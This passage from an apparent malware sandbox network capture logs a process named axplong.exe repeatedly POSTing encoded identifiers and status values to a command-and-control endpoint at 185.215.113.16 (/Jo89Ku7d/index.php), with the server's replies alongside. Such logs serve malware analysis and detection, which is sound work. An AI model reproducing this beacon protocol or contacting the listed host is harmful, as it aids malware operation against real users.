                    Sep 27, 2024 01:43:06.483901024 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:06.488574982 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:06.712541103 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:06 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    3192.168.2.849713185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:06.840336084 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:07.559001923 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:07.605623960 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:07.837276936 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:07 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    4192.168.2.849714185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:07.981076002 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:08.669446945 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:08.670816898 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:08.902663946 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:08 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    5192.168.2.849715185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:09.020642996 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:09.714042902 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:09.715029955 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:09.937987089 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:09 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    6192.168.2.849716185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:10.069989920 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:10.768558979 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:10 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:10.930135965 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:11.157706022 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    7192.168.2.849717185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:11.271292925 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:12.006911993 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:11 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:12.007801056 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:12.238358021 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    8192.168.2.849718185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:12.349724054 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:13.067775011 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:12 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:13.082161903 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:13.312272072 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:13 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    9192.168.2.849719185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:13.466136932 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:14.162620068 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:14.163535118 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:14.390566111 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:14 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    10192.168.2.849720185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:14.504458904 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:15.239973068 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:15.241703987 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:15.476587057 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:15 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    11192.168.2.849721185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:15.598439932 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:16.330008030 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:16.386358023 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:16.618587971 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:16 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    12192.168.2.849722185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:16.825735092 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:17.445417881 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:17.446409941 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:17.677828074 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:17 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    13192.168.2.849723185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:17.786559105 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:18.485981941 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Refresh: 0; url = Login.php
                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 1 0
                    Sep 27, 2024 01:43:18.486979008 CEST310OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 156
                    Cache-Control: no-cache
                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 37 46 44 41 37 34 30 43 42 46 33 46 44 33 33 43 32 30 34 41 36 42 34 30 43 30 41 35 43 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32
                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C7FDA740CBF3FD33C204A6B40C0A5C70318BBC0065C0D5A95967DF4A060332
                    Sep 27, 2024 01:43:18.714329004 CEST196INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
                    Date: Thu, 26 Sep 2024 23:43:18 GMT
                    Content-Type: text/html; charset=UTF-8
                    Transfer-Encoding: chunked
                    Connection: keep-alive
                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                    Data Ascii: 7 <c><d>0


                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                    14192.168.2.849724185.215.113.16807648C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                    TimestampBytes transferredDirectionData
                    Sep 27, 2024 01:43:18.833049059 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                    Content-Type: application/x-www-form-urlencoded
                    Host: 185.215.113.16
                    Content-Length: 4
                    Cache-Control: no-cache
                    Data Raw: 73 74 3d 73
                    Data Ascii: st=s
                    Sep 27, 2024 01:43:19.555145025 CEST219INHTTP/1.1 200 OK
                    Server: nginx/1.18.0 (Ubuntu)
